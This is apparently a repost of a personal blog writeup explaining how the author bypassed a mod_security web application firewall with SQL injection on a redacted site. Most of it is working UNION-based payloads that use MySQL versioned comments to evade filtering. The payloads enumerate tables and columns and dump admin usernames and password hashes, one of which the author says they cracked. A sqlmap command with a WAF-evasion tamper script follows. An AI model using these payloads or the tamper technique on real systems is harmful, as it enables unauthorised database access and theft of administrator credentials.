SQL Injection — WAF Bypass!

3 years ago 175
BOOK THIS SPACE FOR AD
ARTICLE AD

th3.d1p4k

After getting lots of requests for bypass WAF in my DMs about my previous writeup. I decided to make writeup. “Knowledge is free”. Without any delay let’s start.

I hope you guys are know about SQL Injection and their type. So, in this writeup I’ll tell you How I bypassed mod_security WAF and get full access of database.

I put single quote after number and I got an error. Error was like some web page’s element vanished from web page. I was damn sure that there is possible to perform SQL Injection.

weird response

I’m skipping basic part, how to find exact columns in database. There were 10 columns in their database.

Query 1: https://redacted.com/xx/leads_details.php?id=-3 /*!00000union select*/ 1,2,3,4,5,6,7,8,9,10 — +

Query 2: https://redacted.com/xx/leads_details.php?id=-3 /*!00000union select*/ 1,2,3,4,5,database(),7,8,9,10 — +

database name

Query 3: https://redacted.com/xx/leads_details.php?id=-3 /*!00000union select*/ 1,2,3,4,5,group_concat(table_name),7,8,9 from /*!00000information_schema.tables*/ /*!00000where*/ /*!00000table_schema*/=database() — +

Query 4: https://redacted.com/xx/leads_details.php?id=-3 /*!00000union select*/ 1,2,3,4,5,group_concat(column_name),7,8,9 from /*!00000information_schema.columns*/ /*!00000where*/ /*!00000table_name*/=’admin’ — +

admin’s Username, password, id, name, email, address

Query 6: https://redacted.com/xx/leads_details.php?id=-3 /*!00000union select*/ 1,2,3,4,5,group_concat(Username,0x0a,password,0x0a,name),7,8,9 from admin — +

Username is admin, name is dev and password were in hash, I found that hash type of MD5 and I cracked it. it was admin’s name like this “dev456”

This is manual method. You can also use automation (sqlmap -u “site.com/details.php?id=1” –dbs — banner –tamper=modsecurityzeroversioned) you can use randomcase script too.

Dance like nobody’s watching!
Read Entire Article